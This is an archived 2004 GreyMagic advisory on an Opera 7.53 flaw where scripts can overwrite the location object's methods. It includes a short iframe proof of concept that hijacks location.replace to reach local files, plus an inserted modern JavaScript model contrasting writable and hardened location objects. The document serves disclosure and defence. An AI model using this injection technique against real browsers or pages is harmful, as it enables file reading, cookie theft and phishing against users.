gm008-op.txt

Posted Aug 7, 2004
Site greymagic.com

GreyMagic Security Advisory GM#008-OP - Opera versions 7.53 and below on Windows, Linux and Macintosh fail to block write-access to the often-used location object, allowing an attacker to gain immediate script access to any webpage.

tags | advisory
systems | linux, windows
SHA-256 | 8765dcc665909546b2b59b8c80d65a8f048fbdd0669c220a3a67b998755b8dc6

GreyMagic Security Advisory GM#008-OP
=====================================

By GreyMagic Software, 05 Aug 2004.

Available in HTML format at
http://www.greymagic.com/security/advisories/gm008-op/.

Topic: Location, Location, Location.

Discovery date: 19 Jul 2004.

Affected applications:
======================

Opera 7.53 and prior on Windows, Linux and Mac.


Introduction:
=============

On 04-Feb-2003 GreyMagic released an advisory [1] concerning Opera's
security model in v7.0. The advisory described several flaws in that
model; one of them allowed an attacker to overwrite native and custom
functions in a victim window. When the victim web-page executed such a
function, the attacker's code ran with the victim's privileges.

Opera tried to prevent such scenarios in Opera 7.01 by blocking
write-access to objects on the victim window.

[1] http://www.greymagic.com/security/advisories/gm002-op/

Discussion:
===========

Unfortunately, Opera failed to block write-access to the often-used
"location" object.

By overwriting methods in this object, an attacker can gain immediate script
access to any web-page that uses one of these methods. This includes both
web-pages in foreign domains and the victim's local file system.

The impacts of this vulnerability include:

* Read-access to files on the victim's file system
* Read-access to lists of files and folders on the victim's file system
* Read-access to emails written or received by M2, Opera's mail program
* Cookie theft
* URL spoofing (phishing)
* Track user browsing history
* Much more...

Several methods are candidates for such attacks: assign(), replace(),
valueOf() and toString(). The first two are triggered only when the
victim explicitly calls them. The latter two are invoked implicitly in
many cases, including:

* str+=location;
* decodeURI(location);
* location*7;
* location+"";

And many others...
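The implicit call sites above are the heart of the problem, so here is an added JavaScript model (not Opera's code and not GreyMagic's demonstration) of a location-like object in two shapes: the weak pre-7.54 shape, where its methods are ordinary writable properties, and a hardened shape where they are non-writable and non-configurable, the way browsers today mark Location's members unforgeable. The object, the hijack attempt and the audit helper are constructed for illustration; only the four method names and the file path come from the advisory.

```javascript
'use strict';
// Constructed model of a browser "location" object (not Opera's code): the four
// methods the advisory names, either in the weak pre-7.54 shape (plain writable
// properties) or hardened (non-writable, non-configurable, i.e. unforgeable).
function makeLocation(href, unforgeable) {
  const loc = { href };
  const methods = {
    assign(url) { loc.href = url; },
    replace(url) { loc.href = url; },
    toString() { return loc.href; },
    valueOf() { return loc.href; },
  };
  for (const [name, fn] of Object.entries(methods)) {
    Object.defineProperty(loc, name, {
      value: fn, enumerable: false, writable: !unforgeable, configurable: !unforgeable,
    });
  }
  return loc;
}
// A foreign script's attempt to replace the coercion hooks; returns whether the
// overwrite took effect. In strict mode a read-only property throws on assignment.
function tryHijack(loc, log) {
  try {
    loc.toString = function () { log.push('attacker code ran'); return 'hijacked'; };
    loc.valueOf = loc.toString;
  } catch (e) { /* blocked: property is read-only */ }
  return loc.toString() === 'hijacked';
}
// The implicit call sites listed in the advisory: each reaches valueOf()/toString()
// although the page never names either method.
function implicitUses(loc) {
  let str = 'visited: ';
  str += loc;
  return [str, decodeURI(loc), loc * 7, loc + ''];
}
// Defender's audit: which of the four methods can a script still replace?
function overwritableMethods(loc) {
  return ['assign', 'replace', 'toString', 'valueOf'].filter((name) => {
    const d = Object.getOwnPropertyDescriptor(loc, name);
    return !d || d.writable || d.configurable;
  });
}
// Run both configurations against the path the advisory uses.
function demo(unforgeable) {
  const log = [];
  const loc = makeLocation('file://localhost/c:/winnt/help/ciadmin.htm', unforgeable);
  const hijacked = tryHijack(loc, log);
  return { hijacked, uses: implicitUses(loc), calls: log.length, weak: overwritableMethods(loc) };
}
```

In the weak shape every one of the four implicit uses runs the replaced function; in the hardened shape the assignment is rejected and the audit reports no overwritable methods.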

In order to gain access to the "file://" protocol, and hence to the entire
file-system, an attacker needs to know of an HTML file in the victim's file
system that actually calls a method of the location object. Such a file was
included in virtually all Windows operating systems: it is named
"CiAdmin.htm" and it can be found in a very predictable path,
%SystemRoot%/Help/.


Exploit:
========

To exploit this vulnerability an attacker can use a simple <iframe>,
pointing to the victim web-page, and inject the malicious code into its
window. Here's an oversimplified example:

<iframe src="blank.html"></iframe>
<script type="text/javascript">
onload=function () {
    // Take the frame's window and navigate it to the local help page that,
    // as described above, calls a method of its location object.
    var oVictim=frames[0];
    oVictim.location.href="file://localhost/c:/winnt/help/ciadmin.htm";
    // Overwrite the frame's location.replace(); Opera 7.53 and below do not
    // block this write, so the local page ends up calling our function.
    oVictim.location.replace=function () {
        oVictim.alert("We now have full file system access using "+location.href);
    }
}
</script>

This code demonstrates how the vulnerability works, but on its own it is
unlikely to succeed, because the malicious code must be injected in the
time-gap between page initiation and page script execution. This leaves a
very narrow window for an attacker to inject code, but with a bit of
scripting this window of opportunity can easily be found. The demonstrations
linked below use simple brute-force and retry mechanisms to inject the code
successfully.


Demonstration:
==============

GreyMagic prepared two proof-of-concept demonstrations of this
vulnerability; they are available at
http://www.greymagic.com/security/advisories/gm008-op/.


Solution:
=========

GreyMagic informed Opera of the vulnerability on 22-Jul-2004. A new version
(7.54) was officially released on 05-Aug-2004 to address this flaw.


Tested on:
==========

Opera 7.52.
Opera 7.53.


Disclaimer:
===========

The information in this advisory and any of its demonstrations is provided
"as is" without warranty of any kind.

GreyMagic Software is not liable for any direct or indirect damages caused
as a result of using the information or demonstrations provided in any part
of this advisory.

- Copyright © 2004 GreyMagic Software.